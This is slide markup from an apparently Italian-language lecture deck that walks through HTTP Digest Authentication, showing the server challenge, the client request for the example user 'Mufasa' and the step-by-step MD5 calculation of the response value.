            <a:ext cx="34766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Client request (no authentication)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" altLang="it-IT" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="113668" name="Rectangle 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AB840346-3652-41E9-A87C-370FD26D1955}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1952626" y="2143126"/>
            <a:ext cx="2246313" cy="46196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endParaRPr lang="it-IT" altLang="it-IT" sz="2800">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="113669" name="Rettangolo 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F77C14AD-709A-4F29-9147-32A1465FDA38}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1952626" y="2786064"/>
            <a:ext cx="17748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Server response</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" altLang="it-IT" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="113670" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{58401C6D-7035-430E-BF87-5B1071B1AA08}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1881188" y="3130550"/>
            <a:ext cx="8572500" cy="33083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HTTP/1.0 401 Unauthorized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20:26:47 GMT </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" altLang="it-IT" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial Unicode MS" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>WWW-Authenticate: Digest realm="testrealm@host.com", qop="auth,auth-int", </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" altLang="it-IT" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial Unicode MS" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>                                                                                   nonce="dcd98b7102dd2f0e8b11d0f600bfb0c093", </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" altLang="it-IT" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial Unicode MS" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>                                                                                   opaque="5ccc069c403ebaf9f0171e9517f40e41"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311 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" altLang="it-IT" sz="1100">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Arial Unicode MS" pitchFamily="34" charset="-128"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" altLang="it-IT" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial Unicode MS" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>&lt;!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/1999/REC-html401-19991224/loose.dtd"&gt; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" altLang="it-IT" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial Unicode MS" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>&lt;HTML&gt;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&lt;TITLE&gt;Error&lt;/TITLE&gt; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" altLang="it-IT" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial Unicode MS" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>&lt;META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1"&gt; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" altLang="it-IT" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial Unicode MS" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>&lt;/HEAD&gt; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" altLang="it-IT" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial Unicode MS" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>&lt;BODY&gt;&lt;H1&gt;401 Unauthorized.&lt;/H1&gt;&lt;/BODY&gt; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" altLang="it-IT" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial Unicode MS" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>&lt;/HTML&gt; </a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" altLang="it-IT" sz="2400">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Arial" panose="020B060402020202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olo 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B4699743-CCFD-448C-8348-CA80C86B4234}"/>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115715" name="Rettangolo 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{47D4B84C-DCB0-4A0C-8108-53D308C38C2C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2095501" y="1714500"/>
            <a:ext cx="6786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b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Client request (user name "Mufasa", password "Circle Of Life")</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="115716" name="Rectangle 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ED65C734-B199-4ADF-965C-1F3B4C0F32CE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2025651" y="2193925"/>
            <a:ext cx="8213725" cy="120015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200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial Unicode MS" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>GET /dir/index.html HTTP/1.0 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" altLang="it-IT" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial Unicode MS" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Host: localhost </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" altLang="it-IT" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial Unicode MS" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Authorization: Digest username="Mufasa", realm="testrealm@host.com", nonce="dcd98b7102dd2f0e8b11d0f600bfb0c093", </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" altLang="it-IT" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial Unicode MS" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>uri="/dir/index.html", qop=auth, nc=00000001, cnonce="0a4f113b", response="6629fae49393a05397450978507c4ef1",</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" altLang="it-IT" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial Unicode MS" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t> opaque="5ccc069c403ebaf9f0171e9517f40e41" </a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" altLang="it-IT" sz="1200">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="115717" name="Rettangolo 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8B41D959-86F9-481F-B6ED-89067D3AD699}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2238376" y="3571875"/>
            <a:ext cx="17748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800" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Server response</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" altLang="it-IT" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="115718" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{893AE8FE-35A0-412F-8885-F307239F148F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2166939" y="4143376"/>
            <a:ext cx="2632075" cy="938213"/>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100">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial Unicode MS" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>HTTP/1.0 200 OK </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" altLang="it-IT" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial Unicode MS" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Server: HTTPd/0.9 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" altLang="it-IT" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial Unicode MS" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Date: Sun, 10 Apr 2005 20:27:03 GMT </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" altLang="it-IT" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial Unicode MS" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Content-Type: text/html </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" altLang="it-IT" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial Unicode MS" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Content-Length: 7984 </a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" altLang="it-IT" sz="1400">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin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olo 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8F7BFD2A-1DEC-467A-9B5C-5F01B06AA7D1}"/>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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B10C3372-9D67-439C-A3DD-766D26464B4D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1981200" y="1600201"/>
            <a:ext cx="8229600" cy="2328863"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr rtlCol="0">
            <a:normAutofit fontScale="62500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The "response" value is calculated in three steps:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-514350" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The MD5 hash of the combined username, authentication realm and password is calculated. The result is referred to as HA1.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-514350" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The MD5 hash of the combined method and digest URI is calculated, e.g. of "GET" and "/dir/index.html". The result is referred to as HA2.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-514350" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The MD5 hash of the combined HA1 result, server nonce (nonce), request counter (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>nc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>), client nonce (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>cnonce</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>), quality of protection code (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>qop</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>) and HA2 result is calculated. The result is the "response" value provided by the client.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="117764" name="Rectangle 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7B25E225-4346-4F4C-A62D-7E873F5014D8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2309814" y="4143376"/>
            <a:ext cx="6143625" cy="2308225"/>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it-IT" altLang="it-IT" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial Unicode MS" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>HA1 = MD5( "Mufasa:testrealm@host.com:Circle Of Life" ) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" altLang="it-IT" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial Unicode MS" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>         =939e7578ed9e3c518a452acee763bce9 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" altLang="it-IT" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial Unicode MS" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>HA2 = MD5( "GET:/dir/index.html" ) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" altLang="it-IT" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial Unicode MS" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>        = 39aff3a2bab6126f332b942af96d3366 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" altLang="it-IT" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial Unicode MS" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Response = MD5( "939e7578ed9e3c518a452acee763bce9:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" altLang="it-IT" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial Unicode MS" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>                              \ dcd98b7102dd2f0e8b11d0f600bfb0c093:\ </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" altLang="it-IT" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial Unicode MS" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>                                00000001:0a4f113b:auth:\ </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" altLang="it-IT" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial Unicode MS" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>                              39aff3a2bab6126f332b942af96d3366" ) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" altLang="it-IT" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial Unicode MS" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>                 = 6629fae49393a05397450978507c4ef1 </a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" altLang="it-IT" sz="3600">
              <a:solidFill>
                <a:schemeClr val="tx1"/>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olo 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1B8619A8-AC74-486A-9C4C-BF201D8EE9C8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" b="1"/>
              <a:t>Example</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
